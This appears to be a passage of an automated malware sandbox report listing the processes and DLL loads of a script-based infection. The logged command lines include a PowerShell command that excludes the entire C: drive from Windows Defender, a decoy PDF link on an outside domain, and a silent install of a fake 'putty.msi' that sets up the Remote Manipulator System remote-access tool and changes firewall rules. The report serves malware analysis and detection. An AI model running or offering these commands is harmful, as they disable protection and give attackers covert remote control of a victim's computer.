          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1828 /prefetch:3
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 85876F97EED0B7EDCFF1192CE7DC76A0
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" -msi_copy "C:\Users\user\AppData\Roaming\putty.msi"
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeProcess created: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ieframe.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ieframe.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.shell.servicehostbuilder.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ieframe.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
